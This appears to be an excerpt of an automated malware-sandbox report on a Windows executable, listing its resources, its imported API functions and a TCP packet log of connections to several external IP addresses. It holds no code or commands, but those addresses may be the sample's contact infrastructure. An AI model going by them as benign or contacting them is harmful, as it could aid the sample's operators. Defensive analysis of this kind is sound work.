RT_ICON | 0xb4448 | 0x627a | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9777865926219754
RT_ICON | 0xba6c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.2599585062240664
RT_ICON | 0xbcc70 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.2954971857410882
RT_ICON | 0xbdd18 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.2531982942430704
RT_ICON | 0xbebc0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.37663934426229506
RT_ICON | 0xbf548 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.24729241877256317
RT_ICON | 0xbfdf0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.22983870967741934
RT_ICON | 0xc04b8 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.25670731707317074
RT_ICON | 0xc0b20 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.21676300578034682
RT_ICON | 0xc1088 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.4370567375886525
RT_ICON | 0xc14f0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.3185483870967742
RT_ICON | 0xc17d8 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.36065573770491804
RT_ICON | 0xc19c0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.46621621621621623
RT_DIALOG | 0xc1ae8 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0xc1be8 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0xc1d08 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0xc1dd0 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0xc1e30 | 0xbc | data | English | United States | 0.6063829787234043
RT_VERSION | 0xc1ef0 | 0x1f4 | data | English | United States | 0.532
RT_MANIFEST | 0xc20e8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                              Dec 4, 2023 15:22:04.503102064 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.503351927 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.503412008 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.503652096 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.506613016 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.506870985 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.506927013 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.507169962 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.510057926 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.510298014 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.510353088 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.510590076 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.513645887 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.513900995 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.513958931 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.514193058 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.516921043 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.517196894 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.517250061 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.517522097 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.520467043 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.520737886 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.520792007 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.520996094 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.523907900 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.524142027 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.525671005 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.525932074 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.525986910 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.526222944 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.529166937 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.529417992 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.529478073 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.529706001 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.532525063 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.532777071 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.532833099 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.533068895 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.535972118 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.536222935 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.536278009 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.536516905 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.539375067 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.539627075 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.539685011 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.539943933 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.542861938 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.543112040 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.543169022 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.543472052 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.546226978 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.546469927 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.546525002 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.546777010 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.549418926 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.549712896 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.549782991 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.550036907 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.552608013 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.552864075 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.552922010 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.553148985 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.556103945 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.556312084 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.556387901 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.556595087 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.558965921 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.559230089 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.559283972 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.559516907 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.562117100 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.562413931 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.562468052 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.562716007 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.565126896 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.565368891 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.566792011 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.567017078 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.567063093 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.567295074 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.569704056 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.569907904 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.569955111 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.570216894 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.572720051 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.573003054 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.573072910 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.573313951 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.574826956 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.575016022 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.575076103 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.575324059 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.575380087 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.575597048 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.577013016 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.577214956 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.577263117 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.577496052 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.579304934 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.579508066 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.579555988 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.579840899 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.581302881 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.581579924 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.581634045 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.581870079 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.583399057 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.583601952 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.583647966 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.583877087 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.585257053 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.585536003 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.585593939 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.585860014 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.587217093 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.587485075 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.587538004 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.587779045 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.589112997 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.589386940 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.589442968 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.589669943 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.591023922 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.591279984 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.591334105 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.591526985 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.592926979 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.593173027 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.593853951 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.594118118 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.594171047 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.594428062 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.595633030 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.595905066 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.595957994 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.596168041 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.597449064 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.597651958 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.597686052 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.597910881 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.599281073 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:04.599565029 CET50130443192.168.11.20142.251.41.1
                                                                                                                              Dec 4, 2023 15:22:04.599601030 CET44350130142.251.41.1192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588677883 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588710070 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:56.588718891 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588759899 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588799953 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588839054 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588879108 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588917971 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.588932037 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:56.588956118 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589118004 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589159966 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589200020 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589240074 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589278936 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589390039 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589431047 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589473009 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.589512110 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.712461948 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.712483883 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.712747097 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713006973 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713152885 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713314056 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713356972 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713373899 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713526011 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713665009 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713793039 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.713917971 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.715848923 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.715868950 CET805013474.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:56.716008902 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:57.854389906 CET5013480192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:58.870075941 CET5013580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:58.993549109 CET805013574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:58.994107962 CET5013580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:58.994398117 CET5013580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:59.121046066 CET805013574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:59.122128010 CET805013574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:59.122924089 CET805013574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:22:59.123100042 CET5013580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:59.123162985 CET5013580192.168.11.2074.208.236.243
                                                                                                                              Dec 4, 2023 15:22:59.246499062 CET805013574.208.236.243192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.618662119 CET5013680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:12.728442907 CET8050136216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.728663921 CET5013680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:12.728913069 CET5013680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:12.870420933 CET8050136216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.870501995 CET8050136216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.870559931 CET8050136216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.870615959 CET8050136216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.870646954 CET5013680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:12.870662928 CET8050136216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.870714903 CET8050136216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:12.870815039 CET5013680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:12.870986938 CET5013680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:14.241472960 CET5013680192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:15.257042885 CET5013780192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:15.366803885 CET8050137216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:15.367463112 CET5013780192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:15.367646933 CET5013780192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:15.526899099 CET8050137216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:15.526979923 CET8050137216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:15.527041912 CET8050137216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:15.527101040 CET8050137216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:15.527153015 CET8050137216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:15.527204990 CET8050137216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:15.527460098 CET5013780192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:15.527460098 CET5013780192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:16.881455898 CET5013780192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:17.897205114 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.007004976 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.007215023 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.008508921 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.172230005 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.172467947 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.172563076 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.282668114 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.282751083 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.282830954 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.282887936 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.282916069 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.282929897 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.283009052 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.283077002 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.283284903 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.336056948 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.336267948 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.394072056 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394148111 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394366026 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.394393921 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394443989 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:18.394454002 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394498110 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394537926 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394584894 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394661903 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394715071 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.394867897 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.446093082 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.512762070 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.512830019 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.512873888 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.512993097 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.513305902 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.513370037 CET8050138216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:23:18.513606071 CET5013880192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:23:19.521579981 CET5013880192.168.11.20216.40.34.41
